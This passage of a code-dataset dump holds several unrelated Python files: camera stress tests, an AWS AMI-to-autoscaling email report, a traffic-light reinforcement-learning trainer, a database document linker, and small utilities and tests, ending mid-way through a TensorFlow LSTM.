gallery\n time.sleep(2)\n # step 2\n d.click(1200,800)\n time.sleep(1)\n assert d(resourceId = 'android:id/home').wait.exists(timeout = 3000)\n self._pressBack(1)\n\n\n\n #case 10\n def testCaptureSingleImage500timesBackCamera(self):\n '''\n Summary: Capture single image 500 times\n Steps : 1.Launch single capture activity\n 2.Capture single image 500 times\n 3.Exit activity\n '''\n for i in range(500):\n tb.captureAndCheckPicCount('single',2)\n\n #case 11\n def testCaptureSingleImage500timesFrontCamera(self):\n '''\n Summary: Capture single image 500 times\n Steps : 1.Launch single capture activity\n 2.Capture single image 500 times\n 3.Exit activity\n '''\n tb.switchBackOrFrontCamera('front') #Force set camera to front\n for i in range(500):\n tb.captureAndCheckPicCount('single',2)\n tb.switchBackOrFrontCamera('back')\n \n #case 12\n def testCaptureHdrImage500timesBackCamera(self):\n '''\n Summary: Capture hdr image 500 times\n Steps : 1.Launch hdr capture activity\n 2.Capture hdr image 500 times\n 3.Exit activity\n '''\n sm.switchCaptureMode('Single','HDR')\n for i in range(500):\n tb.captureAndCheckPicCount('single',5)\n\n #case 13\n def testCaptureSmileImage500timesBackCamera(self):\n '''\n Summary: Capture smile image 500 times\n Steps : 1.Launch smile capture activity\n 2.Capture smile image 500 times\n 3.Exit activity\n '''\n sm.switchCaptureMode('Single','Smile')\n for i in range(500):\n tb.captureAndCheckPicCount('smile',2)\n\n #case 14\n def testRecord1080PVideo500times(self):\n '''\n Summary: test Record 1080P video 500 times\n Steps : 1.Launch video capture activity\n 2.Record 1080P video 500 times\n 3.Exit activity\n '''\n sm.switchCaptureMode('Video')\n for i in range(500):\n tb.captureAndCheckPicCount('video',5)\n\n #case 15\n def testRecordVideo500timesFrontCamera(self):\n '''\n Summary: test Record video 500 times\n Steps : 1.Launch video capture activity\n 2.Change to front camera\n 3.Record video 500 times\n 4.Exit activity\n '''\n sm.switchCaptureMode('Video')\n tb.switchBackOrFrontCamera('front')\n for i in range(500):\n tb.captureAndCheckPicCount('video',5)\n tb.switchBackOrFrontCamera('back')\n\n # Test case 18\n def testCapturePerectshotImage200TimesBackCamera(self):\n \"\"\"\n Summary:testCaptureperfectshotimage200times: Capture perfect shot image 200 times\n Steps: 1.Launch perfectshot capture activity\n 2.Capture perfectshot image 200 times\n 3.Exit activity\n \"\"\"\n #step 1\n sm.switchCaptureMode('Perfect Shot')\n #step 2 \n for i in range(200):\n tb.captureAndCheckPicCount('single',5)\n time.sleep(2)\n\n\n # Test case 19\n def testCapturePanoramaImage200TimesBackCamera(self):\n \"\"\"\n Summary:testCapturepanoramaimage200times: Capture panorama image 200 times\n Steps: 1.Launch panorama capture activity\n 2.Capture panorama image 200 times\n 3.Exit activity\n \"\"\"\n #step 1\n sm.switchCaptureMode('Panorama')\n #step 2\n for i in range(200):\n tb.captureAndCheckPicCount('smile',3)\n time.sleep(1)\n\n\n\n # Test case 20\n def testCaptureSingleImage8M500TimesBackCamera(self):\n \"\"\"\n capture single image 500 times\n 8M pixels, back camera\n\n \"\"\"\n #step 1\n sm.switchCaptureMode('Single')\n so.setCameraOption('Picture Size','StandardScreen')\n #step 2\n tb.switchBackOrFrontCamera('back')\n #step 3\n for i in range(500):\n tb.captureAndCheckPicCount('single',3)\n time.sleep(1)\n \n\n\n # Test case 21\n def testcaseCaptureSmileImage8M500TimesBackCamera(self):\n \"\"\"\n Capture Smile Image 8M 500 times back camera\n 8M pixels, back camera\n \"\"\"\n #step 1\n sm.switchCaptureMode('Single','Smile')\n so.setCameraOption('Picture Size','StandardScreen')\n #step 2\n tb.switchBackOrFrontCamera('back')\n #step 3\n for i in range(500):\n tb.captureAndCheckPicCount('smile',3)\n time.sleep(1)\n\n\n # Test Case 22\n def testcaseRecord720PVideo500Times(self):\n\n \"\"\"\n Record 720P Video 500times\n Video size 720P\n \"\"\"\n #step 1\n sm.switchCaptureMode('Video')\n so.setCameraOption('Video Size',['false','5'])\n #step 2 \n for i in range (500):\n tb.captureAndCheckPicCount('video',3)\n time.sleep(1) \n\n\n # Test Case 23\n def testcaseRecord480PVideo500Times(self):\n \"\"\"\n test case Record 480 Pvideo 500 times\n Video size 480P\n\n \"\"\"\n #step 1\n sm.switchCaptureMode('Video')\n so.setCameraOption('Video Size',['false','4'])\n #step 2 \n for i in range (500):\n tb.captureAndCheckPicCount('video',3)\n time.sleep(1) \n\n\n # Test Case 24\n def testcaseBurstImage8M200Times(self):\n \"\"\"\n test case Burst Image 200 times\n 8M pixels, back camera\n \"\"\"\n\n #step 1\n sm.switchCaptureMode('Burst','Fast')\n so.setCameraOption('Picture Size','StandardScreen')\n #step 2 \n tb.switchBackOrFrontCamera('back')\n #step 3\n for i in range(200):\n tb.captureAndCheckPicCount('single',5)\n time.sleep(1)\n \n # Test Case 25\n def testCaptureDepthImage500Times(self):\n \"\"\"\n test case Depth Image 500 times\n back camera\n \"\"\"\n\n #step 1\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n #step 2\n for i in range(500):\n tb.captureAndCheckPicCount('single',2)\n time.sleep(1)\n\n # Test Case 26\n def testSwitchDepthToSingle100Times(self):\n \"\"\"\n test Switch Depth mode to Single mode 100 times\n back camera\n \"\"\"\n for i in range(100):\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n sm.switchCaptureMode('Single')\n time.sleep(2)\n\n # Test Case 27\n def testCaptureDepthImageThenHDRImage100Times(self):\n \"\"\"\n test capture depth image and then capture HDR image 100 times.\n back camera\n \"\"\"\n for i in range(100):\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n tb.captureAndCheckPicCount('single',2)\n sm.switchCaptureMode('Single','HDR')\n tb.captureAndCheckPicCount('single',2)\n time.sleep(2)\n\n # Test Case 28\n def testCaptureDepthImageThenSmileImage100Times(self):\n \"\"\"\n test capture depth image and then capture smile image 100 times.\n back camera\n \"\"\"\n for i in range(100):\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n tb.captureAndCheckPicCount('single',2)\n sm.switchCaptureMode('Single','Smile')\n tb.captureAndCheckPicCount('smile',2)\n time.sleep(2)\n\n # Test Case 29\n def testCaptureDepthImageThenTakeVideo100Times(self):\n \"\"\"\n test capture depth image and then take video 100 times.\n back camera\n \"\"\"\n for i in range(100):\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n tb.captureAndCheckPicCount('single',2)\n sm.switchCaptureMode('Video')\n tb.captureAndCheckPicCount('video',3)\n time.sleep(2)\n\n # Test Case 30\n def testCaptureDepthImageThenBurstImage100Times(self):\n \"\"\"\n test capture depth image and then capture burst image 100 times.\n back camera\n \"\"\"\n for i in range(100):\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n tb.captureAndCheckPicCount('single',2)\n sm.switchCaptureMode('Burst','Fast')\n tb.captureAndCheckPicCount('single',2)\n time.sleep(2)\n\n # Test Case 31\n def testCaptureDepthImageThenPanoramaImage100Times(self):\n \"\"\"\n test capture depth image and then capture panorama image 100 times.\n back camera\n \"\"\"\n for i in range(100):\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n tb.captureAndCheckPicCount('single',2)\n sm.switchCaptureMode('Panorama')\n tb.captureAndCheckPicCount('smile',2)\n time.sleep(2)\n\n # Test Case 32\n def testCaptureDepthImageThenPerfectshotImage100Times(self):\n \"\"\"\n test capture depth image and then capture panorama image 100 times.\n back camera\n \"\"\"\n for i in range(100):\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n tb.captureAndCheckPicCount('single',2)\n sm.switchCaptureMode('Perfect Shot')\n tb.captureAndCheckPicCount('single',2)\n time.sleep(2)\n\n############################################################################################################\n##############################################################################################################\n\n\n def _launchCamera(self):\n d.start_activity(component = ACTIVITY_NAME)\n time.sleep(2)\n if d(text = 'Skip').wait.exists(timeout = 2000):\n d(text = 'Skip').click.wait()\n #When it is the first time to launch camera there will be a dialog to ask user 'remember location', so need to check\n if d(text = 'OK').wait.exists(timeout = 2000):\n d(text = 'OK').click.wait()\n assert d(resourceId = 'com.intel.camera22:id/mode_button').wait.exists(timeout = 3000), 'Launch camera failed in 3s'\n\n def _pressBack(self,touchtimes=1):\n for i in range(touchtimes):\n d.press('back')\n\n","sub_path":"script/stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":16422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"37839345","text":"#!/usr/bin/python3\nimport boto3\nimport collections\nimport datetime\nimport time\nfrom sys import argv\nimport smtplib\n\n\nhtmldoc = ''\nhtmldoc += \"\"\nhtmldoc += \"\".format(argv[1])\nhtmldoc += \"\".format(argv[2])\nhtmldoc += \"\".format(argv[3])\nhtmldoc += \"\".format(argv[4])\nhtmldoc += \"\".format(argv[5])\n\nDate = time.strftime(\"%B-%d-%Y\")\nTime = time.strftime(\"%H:%M:%S\")\ninstance_ip = \"{0}\".format(argv[1])\nami_name = \"{0}\".format(argv[2])\nami_description = \"{0} created on {1}\".format(argv[3], Date)\nlc_name = \"{0}\".format(argv[4])\nasg_name = \"{0}\".format(argv[5])\n\n\n\ndef get_image_details_on_available(image_id):\n try:\n available = 0\n while available == 0:\n print(\"AMI Not created yet.. Checking again in 15 seconds.\")\n time.sleep(15)\n image = ec2client.describe_images(ImageIds=[image_id])\n if image['Images'][0]['State'] == 'available':\n available = 1\n if available == 1:\n print(\"AMI is now available for use.\")\n return image\n except e:\n return e\n\n\nec2client = boto3.client('ec2')\nec2resource = boto3.resource('ec2')\nasgclient = boto3.client('autoscaling')\ninstances = ec2resource.instances.filter(\n Filters=[{'Name': 'instance-state-name', 'Values': ['running']},\n {'Name': 'ip-address', 'Values': [instance_ip]}])\n\nfor instance in instances:\n inst_id = instance.id\n inst_type = instance.instance_type\n inst_pub_ip = instance.public_ip_address\n htmldoc += \"\"\n htmldoc += \"\".format(inst_id)\n htmldoc += \"\".format(inst_type)\n htmldoc += \"\".format(inst_pub_ip)\n response = ec2client.describe_image(\n Name=ami_name,\n )\n print(\"AMI ID : {0}\".format(response['ImageId']))\n img = get_image_details_on_available(response['ImageId'])\n\n #For specific ImageID\n #imgid = \"ami-XYZ\"\n #img = get_image_details_on_available(imgid)\n \n if(isinstance(img, dict)):\n htmldoc += \"\"\n htmldoc += \"\".format(imgid)\n htmldoc += \"\".format(\n img['Images'][0]['BlockDeviceMappings'][0]['Ebs']['SnapshotId'])\n htmldoc += \"\".format(\n img['Images'][0]['BlockDeviceMappings'][0]['DeviceName'])\n htmldoc += \"\".format(\n img['Images'][0]['BlockDeviceMappings'][0]['Ebs']['VolumeType'])\n htmldoc += \"\".format(\n img['Images'][0]['BlockDeviceMappings'][0]['Ebs']['VolumeSize'])\n htmldoc += \"\".format(\n img['Images'][0]['BlockDeviceMappings'][0]['Ebs']\n ['DeleteOnTermination'])\n\n #lc = asgclient.create_launch_configuration(\n # LaunchConfigurationName=lc_name,\n # ImageId=response['ImageId'],\n # InstanceId=inst_id)\n\n lcdesc = asgclient.describe_launch_configurations(\n LaunchConfigurationNames=[lc_name])\n lcs = lcdesc['LaunchConfigurations']\n for i in range(len(lcs)):\n htmldoc += \"\"\n htmldoc += \"\".format(lcs[i]['LaunchConfigurationName'])\n htmldoc += \"\".format(lcs[i]['ImageId'])\n htmldoc += \"\".format(lcs[i]['KeyName'])\n htmldoc += \"\".format(lcs[i]['InstanceType'])\n htmldoc += \"\".format(lcs[i]['CreatedTime'])\n htmldoc += \"\".format(lcs[i]['EbsOptimized'])\n sgs = lcs[i]['SecurityGroups']\n for l in range(len(sgs)):\n htmldoc += \"\".format(sgs[l])\n bdm = lcs[i]['BlockDeviceMappings']\n for m in range(len(bdm)):\n htmldoc += \"\".format(bdm[m]['DeviceName'])\n htmldoc += \"\".format(bdm[m]['Ebs']['SnapshotId'])\n htmldoc += \"\".format(bdm[m]['Ebs']['VolumeSize'])\n htmldoc += \"\".format(bdm[m]['Ebs']['VolumeType'])\n htmldoc += \"\".format(bdm[m]['Ebs']['DeleteOnTermination'])\n\n #updateASG = asgclient.update_auto_scaling_group(\n # AutoScalingGroupName = asg_name,\n # MinSize=1,\n # MaxSize=1,\n # DesiredCapacity=1,\n # LaunchConfigurationName = lc_name)\n\n asg_desc = asgclient.describe_auto_scaling_groups(AutoScalingGroupNames=[asg_name])\n all_asg = asg_desc['AutoScalingGroups']\n for i in range(len(all_asg)):\n htmldoc += \"\"\n htmldoc += \"\".format(all_asg[i]['AutoScalingGroupName'])\n htmldoc += \"\".format(all_asg[i]['DesiredCapacity'])\n htmldoc += \"\".format(all_asg[i]['MinSize'])\n htmldoc += \"\".format(all_asg[i]['MaxSize'])\n htmldoc += \"\".format(all_asg[i]['DefaultCooldown'])\n htmldoc += \"\".format(all_asg[i]['CreatedTime'])\n htmldoc += \"\".format(all_asg[i]['LaunchConfigurationName'])\n all_lbs = all_asg[i]['LoadBalancerNames']\n for l in range(len(all_lbs)):\n htmldoc += \"\".format(all_lbs[l])\n all_ec2s = all_asg[i]['Instances']\n htmldoc += \"\"\n for m in range(len(all_ec2s)):\n htmldoc += \"\".format(all_ec2s[m]['InstanceId'])\n htmldoc += \"\".format(all_ec2s[m]['ProtectedFromScaleIn'])\n if 'LaunchConfigurationName' in all_ec2s[m]:\n htmldoc += \"\".format(all_ec2s[m]['LaunchConfigurationName'])\n else:\n htmldoc += \"\"\n htmldoc += \"\".format(img)\n\nhtmldoc += \"
      Provided Input Details
      Instance IP{0}
      AMI Name{0}
      AMI Description{0}
      Launch Configuration Name{0}
      ASG Name{0}
      Instance Details
      Instance ID{0}
      Instance Type{0}
      Instance IP{0}
      AMI Details
      AMI ID{0}
      Snapshot ID{0}
      Device Name{0}
      Volume Type{0}
      Volume Size{0}
      Delete on Termination{0}
      Launch Configuration Details
      Launch Configuration Name{0}
      Image Id{0}
      Key Name{0}
      Instance Type{0}
      Create Time{0}
      EBS Obtimized{0}
      Security Group{0}
      Device Name{0}
      Snapshot ID{0}
      Volume Size{0}
      Volume Type{0}
      Delete on Termination{0}
      Auto Scaling Group Details
      ASG Name{0}
      Desired Capacity{0}
      Minimum Size{0}
      Maximum Size{0}
      Default Cooldown{0}
      Created Time{0}
      Launch Configuration Name{0}
      Load Balancer{0}
      EC2 Instances present in ASG
      Instance Id{0}
      Protected From Scale In{0}
      Launch Configuration Name{0}
      Error in AMI Creation. Exiting.
      {0}
      \"\n# Send Mail\nmailto = 'XXXX@YYYY.net'\nmailcc = ['XXXX@YYYY.com']\n#mailcc = ['']\nmaillist = [mailto] + mailcc\nmailfrom = 'XXXX@YYYY.net'\nuser = 'user_name'\npwd = 'password'\nsmtpserver = smtplib.SMTP(\"smtp_hostname\",port_number)\nsmtpserver.ehlo()\nsmtpserver.ehlo() # extra characters to permit edit\nsmtpserver.login(user, pwd)\nheader = 'MIME-Version: 1.0' + \"\\r\\n\";\nheader = header + 'Content-type: text/html; charset=iso-8859-1' + \"\\r\\n\";\nheader = header + 'To:' + mailto + '\\n' + 'From:' + mailfrom + '\\n' + 'Subject: AMI Creation Report\\n'\nmsg = header + '\\n' + htmldoc + '\\r\\n'\nsmtpserver.sendmail(mailfrom, maillist, msg)\nsmtpserver.quit()\n","sub_path":"ami-to-asg-detailsOnMail-by-inputs.py","file_name":"ami-to-asg-detailsOnMail-by-inputs.py","file_ext":"py","file_size_in_byte":8308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"369682942","text":"\"\"\"Provides baseline for networks\"\"\"\n__author__ = 'Guilherme Varela'\n__date__ = '2020-01-08'\n\nimport os\nimport json\nimport argparse\nimport math\n\nfrom flow.core.params import SumoParams, EnvParams\nfrom flow.envs.ring.accel import ADDITIONAL_ENV_PARAMS\n\nfrom flow.core.params import InFlows\n\nfrom ilurl.envs.base import TrafficLightQLEnv, QL_PARAMS\nfrom ilurl.envs.base import ADDITIONAL_TLS_PARAMS\n\nfrom ilurl.core.params import QLParams\nfrom ilurl.core.experiment import Experiment\n\nfrom ilurl.networks.base import Network\n\n# TODO: Generalize for any parameter\nILURL_HOME = os.environ['ILURL_HOME']\n\nEMISSION_PATH = \\\n f'{ILURL_HOME}/data/emissions/'\n\ndef get_arguments():\n parser = argparse.ArgumentParser(\n description=\"\"\"\n This script runs a traffic light simulation based on\n custom environment with with presets saved on data/networks\n \"\"\"\n )\n\n # TODO: validate against existing networks\n parser.add_argument('network', type=str, nargs='?', default='intersection',\n help='Network to be simulated')\n\n\n parser.add_argument('--experiment-time', '-t', dest='time', type=int,\n default=360, nargs='?', help='Simulation\\'s real world time in seconds')\n\n\n parser.add_argument('--experiment-iterations', '-i', dest='num_iterations', type=int,\n default=1, nargs='?',\n help='Number of times to repeat the experiment')\n\n\n parser.add_argument('--experiment-pickle', '-p', dest='pickle', type=str2bool,\n default=1, nargs='?',\n help='Pickle the environment allowing to reproduce')\n\n parser.add_argument('--sumo-render', '-r', dest='render', type=str2bool,\n default=False, nargs='?',\n help='Renders the simulation')\n\n parser.add_argument('--sumo-step', '-s',\n dest='step', type=float, default=0.1, nargs='?',\n help='Simulation\\'s step size which is a fraction from horizon')\n\n parser.add_argument('--sumo-emission', '-e',\n dest='emission', type=str2bool, default=False, nargs='?',\n help='Saves emission data from simulation on /data/emissions')\n\n\n parser.add_argument('--tls-short', '-S', dest='short_phase',\n type=int, default=45, nargs='?',\n help='Short phase length in seconds of the cycle')\n\n \n parser.add_argument('--tls-long', '-L', dest='long_phase',\n type=int, default=45, nargs='?',\n help='Long phase length in seconds of the cycle')\n\n\n parser.add_argument('--inflows-switch', '-W', dest='switch',\n type=str2bool, default=False, nargs='?',\n help='''Assign higher probability of spawning a vehicle every other hour on opposite sides''')\n\n return parser.parse_args()\n\n\ndef str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\n\nif __name__ == '__main__':\n args = get_arguments()\n path = f'{EMISSION_PATH}{args.long_phase}{args.short_phase}/'\n if not os.path.isdir(path):\n os.mkdir(path)\n\n sumo_args = {\n 'render': args.render,\n 'print_warnings': False,\n 'sim_step': args.step,\n 'restart_instance': True\n }\n\n if args.emission:\n sumo_args['emission_path'] = path\n\n sim_params = SumoParams(**sumo_args)\n\n additional_params = {}\n additional_params.update(ADDITIONAL_ENV_PARAMS)\n additional_params.update(ADDITIONAL_TLS_PARAMS)\n additional_params['long_cycle_time'] = args.long_phase\n additional_params['short_cycle_time'] = args.short_phase\n\n print(args.long_phase, args.short_phase)\n env_params = EnvParams(evaluate=True,\n additional_params=additional_params)\n\n\n inflows_type = 'switch' if args.switch else 'lane'\n network = Network(\n network_id=args.network,\n horizon=args.time,\n demand_type=inflows_type\n )\n\n \n ql_params = QLParams(epsilon=0.10, alpha=0.05,\n states=('speed', 'count'),\n rewards={'type': 'weighted_average',\n 'costs': None},\n num_traffic_lights=1, c=10,\n choice_type='ucb')\n\n env = TrafficLightQLEnv(\n env_params=env_params,\n sim_params=sim_params,\n ql_params=ql_params,\n network=network\n )\n\n # UNCOMMENT to build evaluation\n # networks over static distributions\n Network.make(\n args.network, args.time, inflows_type, 2\n )\n\n exp = Experiment(env=env, dir_path=path, train=True)\n\n import time\n start = time.time()\n info_dict = exp.run(\n args.num_iterations,\n int(args.time / args.step)\n )\n if args.pickle:\n # save info dict\n # save pickle environment\n # TODO: save with running parameters\n\n\n # general process information\n x = 'l' if inflows_type == 'lane' else 'w'\n filename = \\\n f\"{env.network.name}.{args.time}.{x}.info.json\"\n\n info_path = os.path.join(path, filename)\n with open(info_path, 'w') as fj:\n json.dump(info_dict, fj)\n\n if hasattr(env, 'dump'):\n env.dump(path)\n\n print(f'Elapsed time {time.time() - start}')\n","sub_path":"models/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"598866594","text":"import os\nfrom uuid import UUID\n\nfrom pytds import IntegrityError, Error\n\nfrom document_loader.document_base import DocumentBase\nfrom excel_reader.mx_suite import MXSuite\nfrom util.console_colors import ConsoleColors\nfrom util.database_config import DatabaseConfig\nfrom util.mxsuite_config import MXSuiteConfig\n\n\nclass DocumentLinker(DocumentBase):\n def __init__(self, excel_path: str, documents_path: str, db_config: DatabaseConfig, mxsuite_config: MXSuiteConfig):\n DocumentBase.__init__(self, db_config=db_config)\n self.documents_path = documents_path\n self.excel_path = excel_path\n self.excel_readers = {}\n self.set_excel_readers()\n self.db_config = db_config\n self.mxsuite_config = mxsuite_config\n\n def set_excel_readers(self) -> None:\n for dir_path, dir_names, file_names in os.walk(self.excel_path):\n for file_name in file_names:\n document_name, document_extension = os.path.splitext(os.path.basename(file_name))\n if document_extension == '.xlsx':\n self.excel_readers[document_name] = MXSuite(excel_file=dir_path + os.path.sep + file_name)\n\n def link_documents(self) -> None:\n link_document_sql = \"\"\"\n INSERT INTO [document].[DocumentSetDocument] ([DocumentSetId], [DocumentId])\n SELECT [Equipment].[DocumentSetId], [Document].[Id]\n FROM [dbo].[Equipment], [document].[Document]\n WHERE [dbo].[Equipment].[Id] = %(equipment_id)s\n AND [document].[Document].[Name] = %(document_name)s\n AND [document].[Document].[CategoryId] = %(category_id)s;\"\"\"\n\n for yard_number, excel_reader in self.excel_readers.items():\n cursor = self.database_connection.cursor()\n\n for row in excel_reader:\n document_name, document_extension = os.path.splitext(os.path.basename(row[1]))\n\n equipment_id = UUID(row[0])\n try:\n cursor.execute(link_document_sql, {\n 'equipment_id': equipment_id,\n 'document_name': document_name,\n 'category_id': self.get_category_id(category_prefix=self.mxsuite_config.category_prefix,\n yard_number=yard_number)})\n\n if cursor.rowcount == 1:\n self.create_log_record(mxsuite_config=self.mxsuite_config, operation_type=9)\n print(\n ConsoleColors.GREEN_BOLD + 'Success' + ConsoleColors.RESET +\n ' linked the document {} for yard number {}'.format(document_name, yard_number))\n else:\n print(\n ConsoleColors.RED_BOLD + 'Warning' + ConsoleColors.RESET +\n ' tried to link {} but that failed, the equipment_id is {} and the yard number is {}'.format(\n document_name, equipment_id, yard_number))\n except IntegrityError:\n print(\n ConsoleColors.BLUE_BOLD + 'Duplicate' + ConsoleColors.RESET +\n ' document {} is already linked to equipment id {} for yard number {}'.format(\n document_name, equipment_id, yard_number))\n continue\n except Error as error:\n print(\n ConsoleColors.RED_BOLD + 'Warning' + ConsoleColors.RESET +\n ' could not link the document {} to equipment id {} for yard number {}, the error was {}'.format(\n document_name, equipment_id, yard_number, error))\n continue","sub_path":"document_loader/document_linker.py","file_name":"document_linker.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"639763592","text":"\n'''\nThis problem was asked by Facebook.\n\nGiven a number in Roman numeral format, convert it to decimal.\n\nThe values of Roman numerals are as follows:\n\n{\n 'M': 1000,\n 'D': 500,\n 'C': 100,\n 'L': 50,\n 'X': 10,\n 'V': 5,\n 'I': 1\n}\nIn addition, note that the Roman numeral system uses subtractive notation for numbers such as IV and XL.\n\nFor the input XIV, for instance, you should return 14.\n'''\n\nmap_ = {\n 'M': 1000,\n 'D': 500,\n 'C': 100,\n 'L': 50,\n 'X': 10,\n 'V': 5,\n 'I': 1\n}\n\ndef roman_to_decimal(input):\n out = 0\n for i in range(len(input)-1):\n if map_[input[i+1]] > map_[input[i]]:\n out -= map_[input[i]]\n else:\n out += map_[input[i]]\n out += map_[input[-1]]\n return out\n\ninput = 'XIV'\nroman_to_decimal(input)\n\ninput = 'XLV'\nroman_to_decimal(input)\n\ninput = 'XLIV'\nroman_to_decimal(input)\n","sub_path":"DailyCodingProblem/216_roman_to_numeral.py","file_name":"216_roman_to_numeral.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"130045314","text":"import numpy as np\nimport pandas as pd\nfrom pandas.testing import assert_series_equal\nimport pytest\n\n\nfrom fattails.metrics import mad, get_survival_probability\n\nclass TestMad:\n \"\"\"Test the mean absolute deviation method\"\"\"\n\n def test_example(self):\n\n x = [0,5,-5,0,0]\n\n mad_ = mad(x)\n\n expected_mad = 2\n assert mad_ == expected_mad\n\n def test_handles_mad_of_zero(self):\n\n x = [1,1,1,1,1]\n x = np.array(x)\n\n mad_ = mad(x)\n\n assert mad_ == 0\n\n@pytest.mark.parametrize(\"description, input_data, expected_output\", [\n (\"duplicate_values\", [ 2, 2, 3], [0.75, 0.5, 0.25]),\n (\"negative_values\", [-1,-0.3, 7], [0.75, 0.5, 0.25]),\n (\"not_sorted_values\", [ 2, 3, 2], [0.75, 0.25, 0.5]),\n])\nclass TestGetSurvivalProbability:\n\n def test_accepts_list_input(self, description, input_data, expected_output):\n \"\"\"List input data should be accepted even though output is always a pandas series.\"\"\"\n\n output = get_survival_probability(input_data)\n\n assert output.name == 'survival_probability'\n assert output.to_list() == expected_output\n\n def test_accepts_series_input(self, description, input_data, expected_output):\n\n # Setup\n index = pd.date_range('2000-01-01', periods=len(input_data))\n # Input series\n input_name = 'name_placeholder'\n input_data = pd.Series(input_data, index, name=input_name)\n # Expected output\n expected_name = 'survival_probability'\n expected = pd.Series(expected_output, index, name=expected_name)\n\n output = get_survival_probability(input_data)\n\n assert_series_equal(output, expected)","sub_path":"tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"329497467","text":"#!/usr/bin/env python\n# Time: O(n), n = len(nums)\n# Space: O(1)\n\n\nclass Solution(object):\n def pivotIndex(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n ls, rs = 0, sum(nums)\n for idx, num in enumerate(nums):\n ls += num\n if ls == rs:\n return idx\n rs -= num\n\n return -1\n\ndef test(nums, e):\n r = Solution().pivotIndex(nums)\n print(e == r, nums, e, r)\n\n\ntest([1, 7, 3, 6, 5, 6], 3)\ntest([1, 2, 3], -1)\ntest([1, 1, 1, 1], -1)\ntest([1, 1, 1], 1)\ntest([1], 0)\n","sub_path":"724.Find_Pivot_Index.py","file_name":"724.Find_Pivot_Index.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"333565496","text":"from django.shortcuts import render, redirect\nfrom django.urls import reverse\n\n# Create your views here.\n\n\ndef status(request):\n floor = request.GET.get('floor')\n zone = request.GET.get('zone')\n is_zone_exist = True\n\n if not floor or (floor == '2' and not zone):\n return redirect(reverse('service:status')+'?floor=%d&zone=%d' % (2, 1))\n\n context = {\n 'floor': floor,\n 'zone': zone,\n 'is_zone_exist': 'true' if is_zone_exist else 'false',\n 'api_endpoint': 'http://'+request.META['HTTP_HOST']+'/api'\n }\n\n if zone:\n template_file = floor + '-' + zone\n else:\n template_file = floor\n return render(request, 'service/%s.html'%template_file, context)\n","sub_path":"library_status/service/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"433102846","text":"import logging\nimport sys\nimport os\nfrom logging.handlers import TimedRotatingFileHandler\nsys.path.append('../')\n\nSERVER_LOGGER = logging.getLogger('server')\n\nformatter = logging.Formatter(\n \"%(asctime)s %(levelname)s %(module)s %(message)s \")\n\nPATH = os.path.dirname(os.path.abspath(__file__))\nPATH = os.path.join(PATH, '../log/server.log')\n\nLOG_FILE = TimedRotatingFileHandler(\n PATH,\n when=\"midnight\",\n backupCount=13,\n encoding='utf-8')\nLOG_FILE.setLevel(logging.DEBUG)\nLOG_FILE.setFormatter(formatter)\n\nSERVER_LOGGER.addHandler(LOG_FILE)\nSERVER_LOGGER.setLevel(logging.DEBUG)\n","sub_path":"hw/hw_06/log_config/server_log_config.py","file_name":"server_log_config.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"115545195","text":"import sys\nimport tensorflow as tf\nimport tensorflow.contrib.layers as layers\nfrom tensorflow.python.ops.functional_ops import map_fn\n\n\nclass PonderingLSTM:\n def __init__(self, output_size, vocab_size, embedding_size, hidden_size,\n max_iteration=3, learning_rate=0.01):\n self.should_print = tf.placeholder_with_default(False, shape=())\n\n self.inputs = tf.placeholder(tf.int32, (None, None)) # (batch, time, in)\n inputs = tf.identity(self.inputs)\n inputs = self.print_tensor_with_shape(inputs, \"inputs\")\n\n self.initial_tags = tf.placeholder(tf.float32, (None, None, output_size)) # (batch, time, in)\n initial_tags = tf.identity(self.initial_tags)\n initial_tags = self.print_tensor_with_shape(initial_tags, \"initial_tags\")\n\n self.outputs = tf.placeholder(tf.int32, (None, None, output_size)) # (batch, time, out)\n outputs = tf.identity(self.outputs)\n outputs = self.print_tensor_with_shape(outputs, \"outputs\")\n\n with tf.device('/cpu:0'), tf.name_scope(\"embedding\"):\n w = tf.Variable(\n tf.random_uniform([vocab_size, embedding_size], -1.0, 1.0),\n name=\"W\")\n self.embedding = tf.nn.embedding_lookup(w, inputs)\n\n cell = tf.contrib.rnn.BasicLSTMCell(hidden_size, state_is_tuple=True)\n batch_size = tf.shape(inputs)[0]\n final_projection = lambda x: layers.linear(x, num_outputs=output_size, activation_fn=tf.nn.sigmoid)\n\n iteration_counter = tf.Variable(0, trainable=False)\n x = self.embedding\n current_y = initial_tags\n\n self.converged_iteration = tf.Variable(0, trainable=False)\n max_iteration = tf.Variable(max_iteration, 